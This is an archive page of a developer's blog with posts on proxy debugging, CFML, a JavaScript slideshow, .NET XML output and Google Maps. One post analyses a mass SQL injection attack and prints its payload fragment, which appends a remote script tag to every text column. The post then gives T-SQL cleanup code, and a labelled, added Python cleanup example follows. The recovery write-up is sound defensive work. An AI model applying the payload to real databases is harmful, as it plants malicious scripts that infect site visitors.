Archive for the ‘web’ Category

Proxy your connections for debugging

Monday, February 23rd, 2009

One of the tricky things about having Flash or Ajax client applications that request data on their own is knowing what they are requesting and when. I went nuts today trying to figure out if my Ajax was making the right calls and getting back data, 404 messages, or nothing at all. That was until I remembered Squid.

Squid is a simple proxy server used in the Unix world for logging or filtering web content, but it can be very handy as a desktop tool for debugging rich internet applications.


Looking around, I found this great installer and GUI front end for Squid for OSX called SquidMan.

When you first launch SquidMan it will prompt you to install the Squid subsystem. Just click OK, enter your password, and it will bring up the settings:

You can leave all of the settings at their defaults.

Then from the main dialog, click “Start Squid”

In Firefox, find the network settings under the Advanced tab:

Enter your local computer (127.0.0.1) as the proxy host:

This will now force all of your Firefox traffic to go through the Squid proxy. From the main SquidMan application settings, you can now choose “Tools” and see a log of every URL that is requested by JavaScript or Flash within your browser:

The whole web is malware today

Saturday, January 31st, 2009

Is it just me, or is Google reporting all sites as Malware for everyone today?

screenshot of google

Railo joins Jboss. How did I miss this?

Thursday, November 20th, 2008

I spend most of my days lately doing enterprise-ish type stuff in Java. Way back in the day though, my first paying programming job was writing Cold Fusion during the first dot-com upsurge. Since then I have always had a bit of a soft spot for CFML. I still think it is one of the best languages for non-pro programmers to write pages in and for professionals to do quick mock-ups with. When compared to PHP I think it is generally a better framework for prototyping and simple applications.

The one thing that has always kept me, and I’m sure many others, from choosing CFM for anything was the fact that the license costs over $1000 and not many web hosts support it.

I sort of always thought Macromedia would open source Cold Fusion and I’m somewhat surprised Adobe hasn’t made moves in this direction. Over the past few years several projects have made some headway in building an open source alternative. The Smith project looked like it was the best option until it seemed to fizzle out earlier this year. Now, after clicking around, I noticed a press release that Railo has joined JBoss and will be open sourced!

This is huge news if you are a fan of CFM. JBoss has a lot of clout and resources to get things done. I expect that they will release something that is solid and eventually competes on par with the offerings from Adobe itself.

This, combined with the progress people have made running other languages on the JVM – Groovy, Scala, Ruby, PHP, and Python – makes Java application servers a clear choice for running all sorts of scripted sites on true application servers.

Now, will someone please open source a port of ASP classic so I can host all my legacy apps on Linux? (Sun, I’m looking at you. Who is paying for Sun Java System ASP anyway?)

Javascript Image Morph

Sunday, November 16th, 2008

I’ve been working on an image gallery and needed a way to do nice fades/morphs between a list of images for a slideshow. I used Prototype and script.aculo.us. Here is how I did it:

See the Demo Here

Download Entire Source of Example

JavaScript to do the work:

//preload the images and load them into an array
var imageArray = new Array();
var image01 = new Image(); image01.src = 'photo_01.jpg'; imageArray[imageArray.length] = image01;
var image02 = new Image(); image02.src = 'photo_02.jpg'; imageArray[imageArray.length] = image02;
var image03 = new Image(); image03.src = 'photo_03.jpg'; imageArray[imageArray.length] = image03;
var image04 = new Image(); image04.src = 'photo_04.jpg'; imageArray[imageArray.length] = image04;
var image05 = new Image(); image05.src = 'photo_05.jpg'; imageArray[imageArray.length] = image05;

// imageIndex is going to be the index of the next image to display.
// images 0 and 1 are already loaded into the html (0 is visible behind, 1 is hidden in front)
var imageIndex = 1;

function switchImage() {
	// place the next image to be displayed to the front
	$('imageFront').src = imageArray[imageIndex].src;

	// make the image in front appear, when it is done swap it with the image in the back
	new Effect.Appear('imageFront', { duration: 1.0, afterFinish: function() {
		// make the image in the back the same src as the image in the front
		$('imageBehind').src = $('imageFront').src;

		//hide the image in the front
		$('imageFront').style.display = 'none';
	}});

	// increment the index
	imageIndex++;
	// if we have indexed past the end of the array, go back to zero
	if (imageIndex >= imageArray.length) {
		imageIndex = 0;
	}
}

Within the HTML, the only tricky thing is that you need to position the two IMG tags so they are on top of each other. For my purpose absolute positioning was okay. It may take a little more work for relative positioning.

<html>
<head>
	<script type="text/javascript" src="js/prototype.js"></script>
	<script type="text/javascript" src="js/scriptaculous.js?load=effects"></script>
	<script type="text/javascript">
		/* code from above goes here */
	</script>
</head>
<body onload="setInterval('switchImage()', 3000);">
	<img id="imageBehind" src="photo_01.jpg" style="position:absolute; top:0; left:0;" />
	<img id="imageFront" src="photo_02.jpg" style="position:absolute; top:0; left:0; display:none;" />
</body>
</html>

** update. thanks to Star for letting me know that the morph blinked in Firefox 2.0. I fixed the post and the example so it doesn’t do that anymore. **

Simple .NET script to list all of the .swf files in a folder as XML

Thursday, November 13th, 2008

Here is some handy code for when you have a bunch of .swf files and need some XML to load them into Flash. It should also be easy to change the script to list any other file type you need enumerated.

<%@ Page Language="C#" ContentType="text/xml" %>
<%@ Import Namespace="System.Xml" %>
<%@ Import Namespace="System.IO" %>
<script language="C#" runat="server">
	void Page_Load(object sender, EventArgs e)
	{
		// write the XML straight into the response stream
		XmlTextWriter writer = new XmlTextWriter(Response.Output);
		writer.Formatting = Formatting.Indented;
		writer.Indentation = 4;
		writer.WriteStartDocument();
		writer.WriteStartElement("scenes");

		// every .swf in the same folder as this page, in name order
		string[] files = Directory.GetFiles(Server.MapPath(""), "*.swf");
		Array.Sort(files);
		foreach (string file in files)
		{
			writer.WriteStartElement("movie");
			writer.WriteAttributeString("name", Path.GetFileName(file));
			writer.WriteEndElement();
		}

		writer.WriteEndElement();
		writer.WriteEndDocument();
		writer.Close();
	}
</script>

This will output something like:

<?xml version="1.0" encoding="utf-8"?>
<scenes>
    <movie name="scene_001.swf"/>
    <movie name="scene_002.swf"/>
    <movie name="scene_003.swf"/>
    <movie name="scene_004.swf"/>
    <movie name="scene_005.swf"/>
    <movie name="scene_006.swf"/>
</scenes>

Using SQL Injection attack code to repair database

Thursday, September 25th, 2008

Now that Google has started flagging sites that are linking to badware in their index I’ve been getting quite a few calls from people who have been flagged and need to get back on track.

These are often sites that were written a while back (not by myself) when developers didn’t think as much about SQL injection as they do now. Sometimes the code was just poorly written by someone who didn’t know better. However it happened, each site has its own challenge.

Fixing the security hole is generally straightforward — I usually just have to identify where the SQL isn’t properly escaped and fix that code. The hard part of fixing these sites is repairing the database itself. Some clients have backups, and some I can fix with SQL Log Rescue, but a lot of small clients simply don’t have much control over their server and often don’t have any backups at all.

I had one such client this week whose database had hundreds and hundreds of tables, all with malware code injected into the data. I was initially going to write a script to clean all the data, but after looking at the malware attack, I was able to use their own code to fix the database.

In the server log files I noticed this request coming in for every script several times a day. It looks like it just wanders the internet hoping that the id=2 in the query string won’t be escaped in the code:

 

 

If the id isn’t escaped, as it wasn’t in this situation, a query like this will hit your SQL server:

 

 

Hmm, okay. So what is it executing as the value of @S?
If you change the statement from EXEC(@S) to PRINT(@S) you get this:
Warning: Do not run this on your server, it will mess up ALL of your data.

'u''update ['+@T+'] set ['+@C+']=''"></title><script src="http://www.wirelust.com/baddies-script.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www.wirelust.com/baddies-script.js"></script><!--'''

 

I thought this code was pretty clever. It declares a cursor over every varchar and text column in every table in the database, then loops over the cursor and issues an update command for each column to append their bad script to the end of the data.

Luckily, it is in their best interest to leave your data in place and just append their code at the end – it increases the chance you won’t notice your site is infected.

Since all of the original data is still in the database, I was able to tweak their code a little bit to write a script to fix the data:

DECLARE @T varchar(255), @C varchar(255), @SQL nvarchar(4000)
DECLARE Table_Cursor CURSOR FOR
	-- every varchar, nvarchar, text and ntext column in every user table
	SELECT a.name, b.name FROM sysobjects a, syscolumns b
	WHERE a.id = b.id AND a.xtype = 'u'
	AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
	-- strip their script tag from every row of this column that contains it
	-- note: Replace() will not accept text/ntext columns directly; cast those to varchar(max)/nvarchar(max) first
	SET @SQL = 'update ['+@T+'] set ['+@C+']=Replace(['+@C+'], ''<script src="http://www.wirelust.com/baddies-script.js"></script>'', '''') where ['+@C+'] like ''%<script src="http://www.wirelust.com/baddies-script.js"></script>%'''
	-- print first, then uncomment the exec once the statements look right
	PRINT(@SQL)
	-- exec(@SQL)
	FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
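
The same repair, generalised, as an added example that is not part of the original post: it enumerates every text column of every user table, counts the rows carrying the appended script tag first (the PRINT before the EXEC), and then strips it with one Replace() update per column. SQLite stands in for SQL Server so it runs offline; the tables and rows are constructed sample data, and the marker is the one quoted in the post.

```python
import sqlite3

# Marker the attack appended to every field (from the post; the host is the author's stand-in).
MARKER = '<script src="http://www.wirelust.com/baddies-script.js"></script>'

def quote_ident(name):
    """Double-quote a table or column name so an odd name cannot change the statement."""
    return '"' + name.replace('"', '""') + '"'

def text_columns(conn):
    """Return (table, column) for every text-typed column of every user table."""
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'").fetchall()
    cols = []
    for (table,) in tables:
        for _cid, col, ctype, *_rest in conn.execute("PRAGMA table_info(%s)" % quote_ident(table)).fetchall():
            # SQLite text affinity: the declared type mentions CHAR, CLOB or TEXT
            if any(k in ctype.upper() for k in ("CHAR", "CLOB", "TEXT")):
                cols.append((table, col))
    return cols

def count_infected(conn, marker=MARKER):
    """Dry run: number of rows containing the marker, per (table, column)."""
    hits = {}
    for table, col in text_columns(conn):
        sql = "SELECT count(*) FROM %s WHERE instr(%s, ?) > 0" % (quote_ident(table), quote_ident(col))
        n = conn.execute(sql, (marker,)).fetchone()[0]
        if n:
            hits[(table, col)] = n
    return hits

def clean(conn, marker=MARKER):
    """Strip the marker from every affected row, one UPDATE per column; returns rows updated."""
    total = 0
    for table, col in text_columns(conn):
        t, c = quote_ident(table), quote_ident(col)
        sql = "UPDATE %s SET %s = replace(%s, ?, '') WHERE instr(%s, ?) > 0" % (t, c, c, c)
        total += conn.execute(sql, (marker, marker)).rowcount
    conn.commit()
    return total

def demo_db():
    """Constructed sample data: two tables whose text columns were hit, other columns untouched."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, title VARCHAR(200), blurb TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, headline NVARCHAR(255), body TEXT);""")
    conn.executemany("INSERT INTO products VALUES (?,?,?,?)",
                     [(1, "Widget" + MARKER, "Blue widget" + MARKER, 9.99), (2, "Gadget" + MARKER, "Clean row", 19.99)])
    conn.executemany("INSERT INTO news VALUES (?,?,?)", [(1, "Launch day" + MARKER, "Body text" + MARKER)])
    return conn
```

Run `count_infected()` against a copy of the database before `clean()`, exactly as the PRINT step does for the T-SQL version, so the list of affected columns can be reviewed before anything is rewritten.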
 

Google Maps You Have Failed Me

Thursday, December 7th, 2006

Today I had to meet at a client’s office that I had never been to before. Given that I have 100% faith in technology, I mapped out the directions using a map I had created for the client as my starting point. When I got there I was in the totally incorrect place (a first for me when using Google). I opened up Google Maps on my phone and was able to get directions from the incorrect address to the correct one. I assumed at the time that the original map had the incorrect address typed in on it.

When I got back to the office I tried to fix the client’s site and found myself unable to. It turns out that the maps that Google spits out for its embedded API are different from the maps that Google’s site itself uses. I searched and searched and couldn’t find any reference to this anywhere on the web. I will search more after this post.

Here is the map that Google’s site spits out for the address I am searching for:

Here is the map that Google’s API returns for the same area:

It seems that Google’s site and Google Mobile are using map data from Navteq, while the API is using map data from TeleAtlas.

Interestingly though, the TeleAtlas data appears to be correct and more up to date, but the geocoding for the address is only correct on the Navteq map.

The geocode for the same address on the more up to date map is three miles off.

For good measure I checked out the Yahoo API, which says that it uses data from both TeleAtlas and/or Navteq. It appears to be just Navteq though:

Anyone know anything more about this?

Also, taking screen shots I realize just how 1337 I really am, or messy, ha.